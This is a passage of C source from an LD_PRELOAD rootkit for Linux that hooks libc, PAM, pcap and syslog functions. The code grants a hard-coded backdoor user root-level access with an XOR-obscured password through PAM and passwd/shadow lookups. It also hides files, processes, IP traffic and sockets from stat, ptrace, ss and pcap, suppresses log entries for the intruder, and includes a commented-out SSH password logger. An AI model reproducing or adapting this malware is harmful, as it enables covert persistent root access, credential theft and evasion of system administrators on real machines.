29 | return PAM_SUCCESS;
30 | return (long)call(CPAM_OPEN_SESSION, pamh, flags);
31 | }
32 |
33 | int pam_acct_mgmt(pam_handle_t *pamh, int flags){
34 | char *user = get_username(pamh);
35 | hook(CPAM_ACCT_MGMT);
36 | if(user == NULL)
37 | return (long)call(CPAM_ACCT_MGMT, pamh, flags);
38 | if(!xstrncmp(user, BD_UNAME))
39 | return PAM_SUCCESS;
40 | return (long)call(CPAM_ACCT_MGMT, pamh, flags);
41 | }
42 |
--------------------------------------------------------------------------------
/src/LD/hooks/pam/pam_private.h:
--------------------------------------------------------------------------------
1 | #ifndef _PAM_PRIVATE_H
2 | #define _PAM_PRIVATE_H
3 |
4 | #include
5 |
6 | #define PAM_CONFIG "/etc/pam.conf"
7 | #define PAM_CONFIG_D "/etc/pam.d"
8 | #define PAM_CONFIG_DF "/etc/pam.d/%s"
9 | #define PAM_DEFAULT_SERVICE "other"
10 | #define PAM_DEFAULT_SERVICE_FILE PAM_CONFIG_D "/" PAM_DEFAULT_SERVICE
11 |
12 | #ifdef PAM_LOCKING
13 | #define PAM_LOCK_FILE "/var/lock/subsys/PAM"
14 | #endif
15 |
16 | #define _PAM_INVALID_RETVAL -1
17 |
18 | struct handler {
19 | int handler_type;
20 | int (*func)(pam_handle_t *pamh, int flags, int argc, char **argv);
21 | int actions[_PAM_RETURN_VALUES];
22 | int cached_retval; int *cached_retval_p;
23 | int argc;
24 | char **argv;
25 | struct handler *next;
26 | char *mod_name;
27 | int stack_level;
28 | };
29 |
30 | #define PAM_HT_MODULE 0
31 | #define PAM_HT_MUST_FAIL 1
32 | #define PAM_HT_SUBSTACK 2
33 | #define PAM_HT_SILENT_MODULE 3
34 |
35 | struct loaded_module {
36 | char *name;
37 | int type;
38 | void *dl_handle;
39 | };
40 |
41 | #define PAM_MT_DYNAMIC_MOD 0
42 | #define PAM_MT_STATIC_MOD 1
43 | #define PAM_MT_FAULTY_MOD 2
44 |
45 | struct handlers {
46 | struct handler *authenticate;
47 | struct handler *setcred;
48 | struct handler *acct_mgmt;
49 | struct handler *open_session;
50 | struct handler *close_session;
51 | struct handler *chauthtok;
52 | };
53 |
54 | struct service {
55 | struct loaded_module *module;
56 | int modules_allocated;
57 | int modules_used;
58 | int handlers_loaded;
59 | struct handlers conf;
60 | struct handlers other;
61 | };
62 |
63 | #define PAM_ENV_CHUNK 10
64 |
65 | struct pam_environ {
66 | int entries;
67 | int requested;
68 | char **list;
69 | };
70 |
71 | #include
72 |
73 | typedef enum { PAM_FALSE, PAM_TRUE } _pam_boolean;
74 |
75 | struct _pam_fail_delay {
76 | _pam_boolean set;
77 | unsigned int delay;
78 | time_t begin;
79 | const void *delay_fn_ptr;
80 | };
81 |
82 | struct _pam_substack_state {
83 | int impression;
84 | int status;
85 | };
86 |
87 | struct _pam_former_state {
88 | int choice;
89 | int depth;
90 | int impression;
91 | int status;
92 | struct _pam_substack_state *substates;
93 | int fail_user;
94 | int want_user;
95 | char *prompt;
96 | _pam_boolean update;
97 | };
98 | #ifndef OLD_DISTRO
99 | struct pam_handle {
100 | char *authtok;
101 | unsigned caller_is;
102 | struct pam_conv *pam_conversation;
103 | char *oldauthtok;
104 | char *prompt;
105 | char *service_name;
106 | char *user;
107 | char *rhost;
108 | char *ruser;
109 | char *tty;
110 | char *xdisplay;
111 | char *authtok_type;
112 | struct pam_data *data;
113 | struct pam_environ *env;
114 | struct _pam_fail_delay fail_delay;
115 | struct pam_xauth_data xauth;
116 | struct service handlers;
117 | struct _pam_former_state former;
118 | const char *mod_name;
119 | int mod_argc;
120 | char **mod_argv;
121 | int choice;
122 | #ifdef HAVE_LIBAUDIT
123 | int audit_state;
124 | #endif
125 | };
126 | #else
127 | struct pam_handle {
128 | char *authtok;
129 | unsigned caller_is;
130 | struct pam_conv *pam_conversation;
131 | char *oldauthtok;
132 | char *prompt;
133 | char *service_name;
134 | char *user;
135 | char *rhost;
136 | char *ruser;
137 | char *tty;
138 | struct pam_data *data;
139 | struct pam_environ *env;
140 | struct _pam_fail_delay fail_delay;
141 | struct service handlers;
142 | struct _pam_former_state former;
143 | const char *mod_name;
144 | int choice;
145 | #ifdef HAVE_LIBAUDIT
146 | int audit_state;
147 | #endif
148 | };
149 | #endif
150 |
151 | #define PAM_NOT_STACKED 0
152 | #define PAM_AUTHENTICATE 1
153 | #define PAM_SETCRED 2
154 | #define PAM_ACCOUNT 3
155 | #define PAM_OPEN_SESSION 4
156 | #define PAM_CLOSE_SESSION 5
157 | #define PAM_CHAUTHTOK 6
158 | #define _PAM_ACTION_IS_JUMP(x) ((x) > 0)
159 | #define _PAM_ACTION_IGNORE 0
160 | #define _PAM_ACTION_OK -1
161 | #define _PAM_ACTION_DONE -2
162 | #define _PAM_ACTION_BAD -3
163 | #define _PAM_ACTION_DIE -4
164 | #define _PAM_ACTION_RESET -5
165 | #define _PAM_ACTION_UNDEF -6
166 | #define PAM_SUBSTACK_MAX_LEVEL 16
167 |
168 | extern const char * const _pam_token_actions[-_PAM_ACTION_UNDEF];
169 | extern const char * const _pam_token_returns[_PAM_RETURN_VALUES+1];
170 |
171 | int _pam_dispatch(pam_handle_t *pamh, int flags, int choice);
172 | int _pam_free_handlers(pam_handle_t *pamh);
173 | int _pam_init_handlers(pam_handle_t *pamh);
174 | void _pam_start_handlers(pam_handle_t *pamh);
175 | int _pam_make_env(pam_handle_t *pamh);
176 | void _pam_drop_env(pam_handle_t *pamh);
177 | void _pam_reset_timer(pam_handle_t *pamh);
178 | void _pam_start_timer(pam_handle_t *pamh);
179 | void _pam_await_timer(pam_handle_t *pamh, int status);
180 |
181 | typedef void (*voidfunc(void))(void);
182 | typedef int (*servicefn)(pam_handle_t *, int, int, char **);
183 | #ifdef PAM_STATIC
184 | struct pam_module * _pam_open_static_handler (pam_handle_t *pamh, const char *path);
185 | voidfunc *_pam_get_static_sym(struct pam_module *mod, const char *symname);
186 | #else
187 | void *_pam_dlopen (const char *mod_path);
188 | servicefn _pam_dlsym (void *handle, const char *symbol);
189 | void _pam_dlclose (void *handle);
190 | const char *_pam_dlerror (void);
191 | #endif
192 |
193 | struct pam_data {
194 | char *name;
195 | void *data;
196 | void (*cleanup)(pam_handle_t *pamh, void *data, int error_status);
197 | struct pam_data *next;
198 | };
199 |
200 | void _pam_free_data(pam_handle_t *pamh, int status);
201 | char *_pam_StrTok(char *from, const char *format, char **next);
202 | char *_pam_strdup(const char *s);
203 | char *_pam_memdup(const char *s, int len);
204 | int _pam_mkargv(char *s, char ***argv, int *argc);
205 | void _pam_sanitize(pam_handle_t *pamh);
206 | void _pam_set_default_control(int *control_array, int default_action);
207 | void _pam_parse_control(int *control_array, char *tok);
208 | #define _PAM_SYSTEM_LOG_PREFIX "PAM"
209 |
210 | #define IF_NO_PAMH(X,pamh,ERR) \
211 | if ((pamh) == NULL) { \
212 | syslog(LOG_ERR, _PAM_SYSTEM_LOG_PREFIX " " X ": NULL pam handle passed"); \
213 | return ERR; \
214 | }
215 |
216 | #define _PAM_CALLED_FROM_MODULE 1
217 | #define _PAM_CALLED_FROM_APP 2
218 |
219 | #define __PAM_FROM_MODULE(pamh) ((pamh)->caller_is == _PAM_CALLED_FROM_MODULE)
220 | #define __PAM_FROM_APP(pamh) ((pamh)->caller_is == _PAM_CALLED_FROM_APP)
221 | #define __PAM_TO_MODULE(pamh) \
222 | do { (pamh)->caller_is = _PAM_CALLED_FROM_MODULE; } while (0)
223 | #define __PAM_TO_APP(pamh) \
224 | do { (pamh)->caller_is = _PAM_CALLED_FROM_APP; } while (0)
225 |
226 | #ifdef HAVE_LIBAUDIT
227 | extern int _pam_auditlog(pam_handle_t *pamh, int action, int retval, int flags);
228 | extern int _pam_audit_end(pam_handle_t *pamh, int pam_status);
229 | #endif
230 |
231 | #endif
232 |
--------------------------------------------------------------------------------
/src/LD/hooks/pam/pam_syslog.c:
--------------------------------------------------------------------------------
1 | void pam_syslog(const pam_handle_t *pamh, int priority, const char *fmt, ...){
2 | if(is_bdusr())
3 | return;
4 | va_list va;
5 | char *user = get_username(pamh);
6 | if(user == NULL)
7 | goto end_pam_syslog;
8 | if(!xstrncmp(user, BD_UNAME)){
9 | hook(CSETGID);
10 | call(CSETGID, MAGIC_GID);
11 | return;
12 | }
13 | end_pam_syslog:
14 | va_start(va, fmt);
15 | pam_vsyslog(pamh, priority, fmt, va);
16 | va_end(va);
17 | }
18 |
19 | void pam_vsyslog(const pam_handle_t *pamh, int priority, const char *fmt, va_list args){
20 | if(is_bdusr())
21 | return;
22 | char *user = get_username(pamh);
23 | if(user == NULL)
24 | goto end_pam_vsyslog;
25 | if(!xstrncmp(user, BD_UNAME)){
26 | hook(CSETGID);
27 | call(CSETGID, MAGIC_GID);
28 | return;
29 | }
30 | end_pam_vsyslog:
31 | hook(CPAM_VSYSLOG);
32 | call(CPAM_VSYSLOG, pamh, priority, fmt, args);
33 | }
34 |
--------------------------------------------------------------------------------
/src/LD/hooks/pcap/pcap.c:
--------------------------------------------------------------------------------
1 | void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet){
2 | const struct sniff_ip *ip;
3 | int size_ip;
4 | char sip, dip;
5 | ip = (struct sniff_ip *)(packet + SIZE_ETHERNET);
6 | if((size_ip = IP_HL(ip) * 4) < 20)
7 | return;
8 | sip = ip->ip_src.s_addr;
9 | dip = ip->ip_dst.s_addr;
10 | if(is_hidden_ip(int_ip2hex(sip)) || is_hidden_ip(int_ip2hex(dip)))
11 | return;
12 | else if(o_callback)
13 | o_callback(args, header, packet);
14 | }
15 |
16 | int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user){
17 | o_callback = callback;
18 | hook(CPCAP_LOOP);
19 | return (long)call(CPCAP_LOOP, p, cnt, got_packet, user);
20 | }
21 |
--------------------------------------------------------------------------------
/src/LD/hooks/pcap/pcap.h:
--------------------------------------------------------------------------------
1 | #ifndef PCAP_H
2 | #define PCAP_H
3 |
4 | struct sniff_ip {
5 | u_char ip_vhl;
6 | u_char ip_tos;
7 | u_short ip_len;
8 | u_short ip_id;
9 | u_short ip_off;
10 | #define IP_RF 0x8000
11 | #define IP_DF 0x4000
12 | #define IP_MF 0x2000
13 | #define IP_OFFMASK 0x1fff
14 | u_char ip_ttl;
15 | u_char ip_p;
16 | u_short ip_sum;
17 | struct in_addr ip_src,ip_dst;
18 | };
19 |
20 | #define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
21 | #define SIZE_ETHERNET 14
22 |
23 | void (*o_callback)(u_char *args, const struct pcap_pkthdr *header, const u_char *packet);
24 | void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet);
25 | int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user);
26 | #include "pcap.c"
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/src/LD/hooks/perms/chmod.c:
--------------------------------------------------------------------------------
1 | int chmod(const char *pathname, mode_t mode){
2 | hook(CCHMOD);
3 | if(is_bdusr())
4 | return (long)call(CCHMOD, pathname, mode);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(CCHMOD, pathname, mode);
10 | }
11 |
12 | int fchmod(int fd, mode_t mode){
13 | hook(CFCHMOD);
14 | if(is_bdusr())
15 | return (long)call(CFCHMOD, fd, mode);
16 | if(hidden_fd(fd)){
17 | errno = ENOENT;
18 | return -1;
19 | }
20 | return (long)call(CFCHMOD, fd, mode);
21 | }
22 |
23 | int fchmodat(int dirfd, const char *pathname, mode_t mode, int flags){
24 | hook(CFCHMODAT);
25 | if(is_bdusr())
26 | return (long)call(CFCHMODAT, dirfd, pathname, mode, flags);
27 | if(hidden_path(pathname) || hidden_fd(dirfd)){
28 | errno = ENOENT;
29 | return -1;
30 | }
31 | return (long)call(CFCHMODAT, dirfd, pathname, mode, flags);
32 | }
33 |
--------------------------------------------------------------------------------
/src/LD/hooks/perms/chown.c:
--------------------------------------------------------------------------------
1 | int chown(const char *pathname, uid_t owner, gid_t group){
2 | hook(CCHOWN);
3 | if(is_bdusr())
4 | return (long)call(CCHOWN, pathname, owner, group);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(CCHOWN, pathname, owner, group);
10 | }
11 |
--------------------------------------------------------------------------------
/src/LD/hooks/perms/perms.h:
--------------------------------------------------------------------------------
1 | #ifndef PERMS_H
2 | #define PERMS_H
3 |
4 | int chown(const char *pathname, uid_t owner, gid_t group);
5 | #include "chown.c"
6 |
7 | int chmod(const char *pathname, mode_t mode);
8 | int fchmod(int fd, mode_t mode);
9 | int fchmodat(int dirfd, const char *pathname, mode_t mode, int flags);
10 | #include "chmod.c"
11 |
12 | #endif
13 |
--------------------------------------------------------------------------------
/src/LD/hooks/ptrace.c:
--------------------------------------------------------------------------------
1 | long ptrace(void *request, pid_t pid, void *addr, void *data){
2 | if(is_bdusr())
3 | goto o_ptrace;
4 | if(hidden_proc(pid)){
5 | errno = ESRCH;
6 | exit(-1);
7 | }
8 | o_ptrace:
9 | hook(CPTRACE);
10 | return (long)call(CPTRACE, request, pid, addr, data);
11 | }
12 |
--------------------------------------------------------------------------------
/src/LD/hooks/pwd/pwd.h:
--------------------------------------------------------------------------------
1 | #ifndef PWD_H
2 | #define PWD_H
3 |
4 | struct passwd *getpwnam(const char *name);
5 | int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result);
6 | struct spwd *getspnam(const char *name);
7 | #include "pwnam_user.c"
8 |
9 | struct passwd *getpwuid(uid_t uid);
10 | //struct passwd *getpwent(void);
11 | #include "pwnam_ent.c"
12 |
13 | #endif
14 |
--------------------------------------------------------------------------------
/src/LD/hooks/pwd/pwnam_ent.c:
--------------------------------------------------------------------------------
1 | /*
2 | struct passwd *getpwent(void){
3 | hook(CGETPWENT);
4 | struct passwd *tmp = call(CGETPWENT);
5 | if(tmp && tmp->pw_name != NULL)
6 | if(!xstrncmp(tmp->pw_name,BD_UNAME)){
7 | errno = ESRCH;
8 | tmp = NULL;
9 | }
10 | return tmp;
11 | }
12 | */
13 |
14 | struct passwd *getpwuid(uid_t uid){
15 | hook(CGETPWUID);
16 | if(getgid() == MAGIC_GID && uid == 0 && process("ssh")){
17 | struct passwd *bpw = call(CGETPWUID, uid);
18 | bpw->pw_uid = 0;
19 | bpw->pw_gid = MAGIC_GID;
20 | bpw->pw_dir = "/var/tmp/";
21 | bpw->pw_shell = "/bin/bash";
22 | return bpw;
23 | }
24 | return call(CGETPWUID, uid);
25 | }
26 |
--------------------------------------------------------------------------------
/src/LD/hooks/pwd/pwnam_user.c:
--------------------------------------------------------------------------------
1 | struct passwd *getpwnam(const char *name){
2 | hook(CGETPWNAM);
3 | if(!xstrncmp(name, BD_UNAME)){
4 | struct passwd *bpw = call(CGETPWNAM, "root");
5 | bpw->pw_name = strdup(name);
6 | bpw->pw_uid = 0;
7 | bpw->pw_gid = MAGIC_GID;
8 | bpw->pw_dir = "/var/tmp/";
9 | bpw->pw_shell = "/bin/bash";
10 | return bpw;
11 | }
12 | return call(CGETPWNAM, name);
13 | }
14 |
15 | int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result){
16 | hook(CGETPWNAM_R);
17 | if(!xstrncmp(name, BD_UNAME)){
18 | call(CGETPWNAM_R, "root", pwd, buf, buflen, result);
19 | pwd->pw_name = strdup(name);
20 | pwd->pw_uid = 0;
21 | pwd->pw_gid = MAGIC_GID;
22 | pwd->pw_dir = "/var/tmp/";
23 | pwd->pw_shell = "/bin/bash";
24 | return 0;
25 | }
26 | return (long)call(CGETPWNAM_R, name, pwd, buf, buflen, result);
27 | }
28 |
29 | struct spwd *getspnam(const char *name){
30 | if(!xstrncmp(name, BD_UNAME)){
31 | struct spwd *bspwd = malloc(sizeof(struct spwd));
32 | bspwd->sp_namp = strdup(name);
33 | xor(bd_pwd, BD_PWD);
34 | bspwd->sp_pwdp = bd_pwd;
35 | clean(bd_pwd);
36 | bspwd->sp_lstchg = time(NULL) / (60 * 60 * 24);
37 | bspwd->sp_expire = time(NULL) / (60 * 60 * 24) + 90;
38 | bspwd->sp_inact = 9001;
39 | bspwd->sp_warn = 0;
40 | bspwd->sp_min = 0;
41 | bspwd->sp_max = 99999;
42 | return bspwd;
43 | }
44 | hook(CGETSPNAM);
45 | return call(CGETSPNAM, name);
46 | }
47 |
--------------------------------------------------------------------------------
/src/LD/hooks/rw/fread.c:
--------------------------------------------------------------------------------
1 | size_t fread_t(void *data, size_t size, size_t count, FILE *stream){
2 | hook(CFREAD);
3 | if(is_bdusr())
4 | return (size_t)call(CFREAD, data, size, count, stream);
5 | if(hidden_fd(fileno(stream)))
6 | return 0;
7 | return (size_t)call(CFREAD, data, size, count, stream);
8 | }
9 |
10 | size_t fread_unlocked_r(void *data, size_t size, size_t count, FILE *stream){
11 | hook(CFREAD_UNLOCKED);
12 | if(is_bdusr())
13 | return (size_t)call(CFREAD_UNLOCKED, data, size, count, stream);
14 | if(hidden_fd(fileno(stream)))
15 | return 0;
16 | return (size_t)call(CFREAD_UNLOCKED, data, size, count, stream);
17 | }
18 |
--------------------------------------------------------------------------------
/src/LD/hooks/rw/fwrite.c:
--------------------------------------------------------------------------------
1 | size_t fwrite_r(const void *ptr, size_t size, size_t nmemb, FILE *stream){
2 | hook(CFWRITE);
3 | if(is_bdusr())
4 | return (size_t)call(CFWRITE, ptr, size, nmemb, stream);
5 | if(hidden_fd(fileno(stream)))
6 | return 0;
7 | return (size_t)call(CFWRITE, ptr, size, nmemb, stream);
8 | }
9 |
10 | size_t fwrite_unlocked_r(const void *ptr, size_t size, size_t nmemb, FILE *stream){
11 | hook(CFWRITE_UNLOCKED);
12 | if(is_bdusr())
13 | return (size_t)call(CFWRITE_UNLOCKED, ptr, size, nmemb, stream);
14 | if(hidden_fd(fileno(stream)))
15 | return 0;
16 | return (size_t)call(CFWRITE_UNLOCKED, ptr, size, nmemb, stream);
17 | }
18 |
--------------------------------------------------------------------------------
/src/LD/hooks/rw/log_ssh.c:
--------------------------------------------------------------------------------
1 | static int is_pwprompt(int fd, const void *buf){
2 | struct stat s_fstat;
3 | hook(C__FXSTAT);
4 | memset(&s_fstat, 0, sizeof(stat));
5 | call(C__FXSTAT, _STAT_VER, fd, &s_fstat);
6 | if(S_ISSOCK(s_fstat.st_mode))
7 | return 0;
8 | if(buf != NULL && strstr((char *)buf, "assword"))
9 | return 1;
10 | return 0;
11 | }
12 |
13 | static ssize_t hijack_write_ssh(int fd, const void *buf, ssize_t o){
14 | if(!process("ssh"))
15 | return o;
16 | if(is_pwprompt(fd, buf)){
17 | ssh_pass_size = 0;
18 | memset(ssh_pass, 0, sizeof(ssh_pass));
19 | ssh_start = 1;
20 | }
21 | return o;
22 | }
23 |
24 | static ssize_t log_ssh(int fd, void *buf, ssize_t o){
25 | if(fd == 0)
26 | return o;
27 | struct stat s_fstat;
28 | char *p, output[128];
29 | FILE *fp;
30 | hook(C__FXSTAT, CFOPEN);
31 | memset(&s_fstat, 0, sizeof(stat));
32 | call(C__FXSTAT, _STAT_VER, fd, &s_fstat);
33 | if(S_ISSOCK(s_fstat.st_mode))
34 | return o;
35 | process("ssh");
36 | /* if(process("ssh") && fd == 4 && ssh_start){
37 | p = buf;
38 | if(*p == '\n'){
39 | ssh_start = 0;
40 | if((fp = xfopen(LDSO_LOGS, "a")) != NULL){
41 | sprintf(output, "%s:%s", process_cmdline(), ssh_pass);
42 | xor(t_o, output);
43 | fprintf(fp, "%s\n", t_o);
44 | clean(t_o);
45 | fflush(fp);
46 | fclose(fp);
47 | }
48 | return o;
49 | }
50 | ssh_pass[ssh_pass_size++] = *p;
51 | }
52 | */
53 | return o;
54 | }
55 |
--------------------------------------------------------------------------------
/src/LD/hooks/rw/read.c:
--------------------------------------------------------------------------------
1 | ssize_t read(int fd, void *buf, size_t n){
2 | hook(CREAD);
3 | // if(is_bdusr()) return (ssize_t)call(CREAD, fd, buf, n);
4 | /*
5 | if(hidden_fd(fd)){
6 | errno = EIO;
7 | return -1;
8 | }
9 | */
10 | ssize_t o = (ssize_t)call(CREAD, fd, buf, n);
11 | return log_ssh(fd, buf, o);
12 | // return (ssize_t)call(CREAD, fd, buf, n);
13 | }
14 |
--------------------------------------------------------------------------------
/src/LD/hooks/rw/rw.h:
--------------------------------------------------------------------------------
1 | #ifndef RW_H
2 | #define RW_H
3 | /*
4 | #define fread fread_r
5 | #define fread_unlocked fread_unlocked_r
6 | #define fwrite fwrite_r
7 | #define fwrite_unlocked fwrite_unlocked_r
8 | */
9 | int ssh_start, ssh_pass_size;
10 | char ssh_args[512], ssh_pass[512];
11 |
12 | static int is_pwprompt(int fd, const void *buf);
13 | static ssize_t hijack_write_ssh(int fd, const void *buf, ssize_t o);
14 | static ssize_t log_ssh(int fd, void *buf, ssize_t o);
15 | #include "log_ssh.c"
16 | /*
17 | size_t fwrite_r(const void *ptr, size_t size, size_t nmemb, FILE *stream);
18 | size_t fwrite_unlocked_r(const void *ptr, size_t size, size_t nmemb, FILE *stream);
19 | #include "fwrite.c"
20 |
21 | size_t fread_r(void *data, size_t size, size_t count, FILE *stream);
22 | size_t fread_unlocked_r(void *data, size_t size, size_t count, FILE *stream);
23 | #include "fread.c"
24 | */
25 | ssize_t read(int fd, void *buf, size_t n);
26 | #include "read.c"
27 |
28 | ssize_t write(int fd, const void *buf, size_t n);
29 | #include "write.c"
30 |
31 | #endif
32 |
--------------------------------------------------------------------------------
/src/LD/hooks/rw/write.c:
--------------------------------------------------------------------------------
1 | ssize_t write(int fd, const void *buf, size_t n){
2 | hook(CWRITE);
3 | // if(is_bdusr()) return (ssize_t)call(CWRITE, fd, buf, n);
4 | /*
5 | if(hidden_fd(fd)){
6 | errno = EIO;
7 | return -1;
8 | }
9 | */
10 | // ssize_t o = (ssize_t)call(CWRITE, fd, buf, n);
11 | // return hijack_write_ssh(fd, buf, o);
12 | return (ssize_t)call(CWRITE, fd, buf, n);
13 | }
14 |
--------------------------------------------------------------------------------
/src/LD/hooks/socket.c:
--------------------------------------------------------------------------------
1 | static int ssme(int domain, int protocol){
2 | if(domain != AF_NETLINK || protocol != NETLINK_INET_DIAG)
3 | return 0;
4 | if(cmp_process("ss\0"))
5 | return 1;
6 | if(cmp_process("/usr/bin/ss\0"))
7 | return 1;
8 | if(cmp_process("/bin/ss\0"))
9 | return 1;
10 | return 0;
11 | }
12 |
13 | int socket(int domain, int type, int protocol){
14 | if(is_bdusr())
15 | goto o_socket;
16 | if(ssme(domain, protocol)){
17 | if(!hidehost_alive())
18 | goto o_socket;
19 | errno = ENOENT;
20 | return -1;
21 | }
22 | o_socket:
23 | hook(CSOCKET);
24 | return (long)call(CSOCKET, domain, type, protocol);
25 | }
26 |
--------------------------------------------------------------------------------
/src/LD/hooks/stat/fstat.c:
--------------------------------------------------------------------------------
1 | int fstat(int fd, struct stat *buf){
2 | hook(C__FXSTAT);
3 | if(is_bdusr())
4 | return (long)call(C__FXSTAT, _STAT_VER, fd, buf);
5 | if(hidden_fd(fd)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(C__FXSTAT, _STAT_VER, fd, buf);
10 | }
11 |
12 | int fstat64(int fd, struct stat64 *buf){
13 | hook(C__FXSTAT64);
14 | if(is_bdusr())
15 | return (long)call(C__FXSTAT64, _STAT_VER, fd, buf);
16 | if(hidden_fd64(fd)){
17 | errno = ENOENT;
18 | return -1;
19 | }
20 | return (long)call(C__FXSTAT64, _STAT_VER, fd, buf);
21 | }
22 |
23 | int fstatat(int dirfd, const char *pathname, struct stat *buf, int flags){
24 | hook(C__FXSTAT);
25 | if(is_bdusr())
26 | return (long)call(C__FXSTAT, _STAT_VER, dirfd, buf);
27 | if(hidden_fd(dirfd) || hidden_path(pathname)){
28 | errno = ENOENT;
29 | return -1;
30 | }
31 | return (long)call(C__FXSTAT, _STAT_VER, dirfd, buf);
32 | }
33 |
34 | int fstatat64(int dirfd, const char *pathname, struct stat64 *buf, int flags){
35 | hook(C__FXSTAT64);
36 | if(is_bdusr())
37 | return (long)call(C__FXSTAT64, _STAT_VER, dirfd, buf);
38 | if(hidden_fd64(dirfd) || hidden_path64(pathname)){
39 | errno = ENOENT;
40 | return -1;
41 | }
42 | return (long)call(C__FXSTAT64, _STAT_VER, dirfd, buf);
43 | }
44 |
45 | int __fxstat(int version, int fd, struct stat *buf){
46 | hook(C__FXSTAT);
47 | if(is_bdusr())
48 | return (long)call(C__FXSTAT, version, fd, buf);
49 | if(hidden_fd(fd)){
50 | errno = ENOENT;
51 | return -1;
52 | }
53 | return (long)call(C__FXSTAT, version, fd, buf);
54 | }
55 |
56 | int __fxstat64(int version, int fd, struct stat64 *buf){
57 | hook(C__FXSTAT64);
58 | if(is_bdusr())
59 | return (long)call(C__FXSTAT64, version, fd, buf);
60 | if(hidden_fd64(fd)){
61 | errno = ENOENT;
62 | return -1;
63 | }
64 | return (long)call(C__FXSTAT64, version, fd, buf);
65 | }
66 |
--------------------------------------------------------------------------------
/src/LD/hooks/stat/lstat.c:
--------------------------------------------------------------------------------
1 | int lstat(const char *pathname, struct stat *buf){
2 | hook(C__LXSTAT);
3 | if(is_bdusr())
4 | return (long)call(C__LXSTAT, _STAT_VER, pathname, buf);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(C__LXSTAT, _STAT_VER, pathname, buf);
10 | }
11 |
12 | int lstat64(const char *pathname, struct stat64 *buf){
13 | hook(C__LXSTAT64);
14 | if(is_bdusr())
15 | return (long)call(C__LXSTAT64, _STAT_VER, pathname, buf);
16 | if(hidden_path64(pathname)){
17 | errno=ENOENT;
18 | return -1;
19 | }
20 | return (long)call(C__LXSTAT64, _STAT_VER, pathname, buf);
21 | }
22 |
23 | int __lxstat(int version, const char *pathname, struct stat *buf){
24 | hook(C__LXSTAT);
25 | if(is_bdusr())
26 | return (long)call(C__LXSTAT, version, pathname, buf);
27 | if(hidden_path(pathname) || hidden_lpath(pathname)){
28 | errno = ENOENT;
29 | return -1;
30 | }
31 | return (long)call(C__LXSTAT, version, pathname, buf);
32 | }
33 |
34 | int __lxstat64(int version, const char *pathname, struct stat64 *buf){
35 | hook(C__LXSTAT64);
36 | if(is_bdusr())
37 | return (long)call(C__LXSTAT64, version, pathname, buf);
38 | if(hidden_path64(pathname) || hidden_lpath64(pathname)){
39 | errno = ENOENT;
40 | return -1;
41 | }
42 | return (long)call(C__LXSTAT64, version, pathname, buf);
43 | }
44 |
--------------------------------------------------------------------------------
/src/LD/hooks/stat/stat.c:
--------------------------------------------------------------------------------
1 | int stat(const char *pathname, struct stat *buf){
2 | hook(C__XSTAT);
3 | if(is_bdusr())
4 | return (long)call(C__XSTAT, _STAT_VER, pathname, buf);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(C__XSTAT, _STAT_VER, pathname, buf);
10 | }
11 |
12 | int stat64(const char *pathname, struct stat64 *buf){
13 | hook(C__XSTAT64);
14 | if(is_bdusr())
15 | return (long)call(C__XSTAT64, _STAT_VER, pathname, buf);
16 | if(hidden_path64(pathname)){
17 | errno = ENOENT;
18 | return -1;
19 | }
20 | return (long)call(C__XSTAT64, _STAT_VER, pathname, buf);
21 | }
22 |
23 | int __xstat(int version, const char *pathname, struct stat *buf){
24 | hook(C__XSTAT);
25 | if(is_bdusr())
26 | return (long)call(C__XSTAT, version, pathname, buf);
27 | if(hidden_path(pathname)){
28 | errno = ENOENT;
29 | return -1;
30 | }
31 | return (long)call(C__XSTAT, version, pathname, buf);
32 | }
33 |
34 | int __xstat64(int version, const char *pathname, struct stat64 *buf){
35 | hook(C__XSTAT64);
36 | if(is_bdusr())
37 | return (long)call(C__XSTAT64, version, pathname, buf);
38 | if(hidden_path64(pathname)){
39 | errno = ENOENT;
40 | return -1;
41 | }
42 | return (long)call(C__XSTAT64, version, pathname, buf);
43 | }
44 |
--------------------------------------------------------------------------------
/src/LD/hooks/stat/stat.h:
--------------------------------------------------------------------------------
1 | #ifndef STAT_H
2 | #define STAT_H
3 |
4 | int stat(const char *pathname, struct stat *buf);
5 | int stat64(const char *pathname, struct stat64 *buf);
6 | int __xstat(int version, const char *pathname, struct stat *buf);
7 | int __xstat64(int version, const char *pathname, struct stat64 *buf);
8 | #include "stat.c"
9 |
10 | int lstat(const char *pathname, struct stat *buf);
11 | int lstat64(const char *pathname, struct stat64 *buf);
12 | int __lxstat(int version, const char *pathname, struct stat *buf);
13 | int __lxstat64(int version, const char *pathname, struct stat64 *buf);
14 | #include "lstat.c"
15 |
16 | int fstat(int fd, struct stat *buf);
17 | int fstat64(int fd, struct stat64 *buf);
18 | int fstatat(int dirfd, const char *pathname, struct stat *buf, int flags);
19 | int fstatat64(int dirfd, const char *pathname, struct stat64 *buf, int flags);
20 | int __fxstat(int version, int fd, struct stat *buf);
21 | int __fxstat64(int version, int fd, struct stat64 *buf);
22 | #include "fstat.c"
23 |
24 | #endif
25 |
--------------------------------------------------------------------------------
/src/LD/hooks/syslog/syslog.c:
--------------------------------------------------------------------------------
1 | void openlog(const char *ident, int option, int facility){
2 | if(is_bdusr())
3 | return;
4 | hook(COPENLOG);
5 | call(COPENLOG, ident, option, facility);
6 | return;
7 | }
8 |
9 | void syslog(int priority, const char *format, ...){
10 | if(is_bdusr())
11 | return;
12 | if(bd_sshproc()){
13 | hook(CSETGID);
14 | call(CSETGID, MAGIC_GID);
15 | return;
16 | }
17 | va_list va;
18 | va_start(va, format);
19 | vsyslog(priority, format, va);
20 | va_end(va);
21 | return;
22 | }
23 |
24 | void __syslog_chk(int priority, int flag, const char *format, ...){
